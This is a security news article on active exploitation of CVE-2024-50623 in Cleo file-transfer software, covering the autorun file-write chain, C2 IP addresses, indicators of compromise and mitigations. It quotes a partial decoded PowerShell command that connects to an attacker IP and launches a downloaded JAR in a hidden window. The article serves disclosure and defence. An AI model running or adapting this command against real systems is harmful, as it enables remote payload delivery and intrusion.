CVE-2024-50623: Critical Vulnerability in Cleo Software Actively Exploited in the Wild

Huntress Labs has raised the alarm over the active exploitation of a critical vulnerability (CVE-2024-50623) in Cleo’s Harmony, VLTrader, and LexiCom software, commonly used for managing file transfers. Threat actors are targeting organizations en masse, with significant implications for industries like logistics, shipping, and consumer products.

On December 3, Huntress identified a surge in malicious activity targeting Cleo’s widely used software solutions. This vulnerability allows unauthenticated remote code execution (RCE) and remains exploitable despite a recent patch (version 5.8.0.21). According to Huntress, “We’ve directly observed evidence of threat actors exploiting this software en masse and performing post-exploitation activity.” The flaw impacts all versions of the software up to and including 5.8.0.21.

Victims so far include consumer product companies, food suppliers, and logistics organizations, with many potentially vulnerable systems exposed on Shodan. Huntress also noted a sharp uptick in exploitation on December 8.

The exploitation chain leverages an arbitrary file-write vulnerability. The attackers plant malicious files in Cleo’s autorun directory, which the software automatically processes and deletes post-execution. This mechanism facilitates the execution of PowerShell commands, enabling attackers to retrieve additional payloads, such as JAR files with webshell-like persistence.

One decoded PowerShell command observed by Huntress included:

$c=New-Object Net.Sockets.TcpClient("176.123.5.126", 443)
$s=$c.GetStream()
...
Start-Process -WindowStyle Hidden -FilePath jre\bin\java.exe -ArgumentList "-jar $f"

The attack also incorporates reconnaissance tools like nltest.exe for Active Directory enumeration and employs external IPs such as 176.123.5.126 and 5.149.249.226 to maintain command and control (C2).

Huntress strongly advises isolating internet-facing Cleo systems behind a firewall until a comprehensive patch is available. The current mitigations include disabling autorun functionality by clearing the “Autorun Directory” field within the software’s configuration options. However, this step does not address the underlying file-write vulnerability.

For organizations using Cleo software, Huntress recommends checking for indicators of compromise (IOCs) such as the presence of main.xml or 60282967-dc91-40ef-a34c-38e992509c2c.xml files containing encoded PowerShell commands. Huntress further stresses the urgency of applying any forthcoming patches.

Huntress is collaborating with Cleo to address the vulnerability and has developed a proof-of-concept to illustrate the flaw. “Our team is working to reach the Cleo team to report our findings and develop a new patch to fully mitigate exploitation,” Huntress stated. A new CVE designation and patch are expected soon.

Related Posts:

• Hackers Exploit Foundation Software, Exposing Sensitive Contractor Data
• ScreenConnect Abuse: Hackers Leverage Remote Access Tool for Healthcare Intrusion
• Researchers to release SysAid CVE-2023-47246 exploit
• Fake Browser Updates Lead to Malicious BOINC Installations
• SafePay Ransomware: A New Threat with Sophisticated Techniques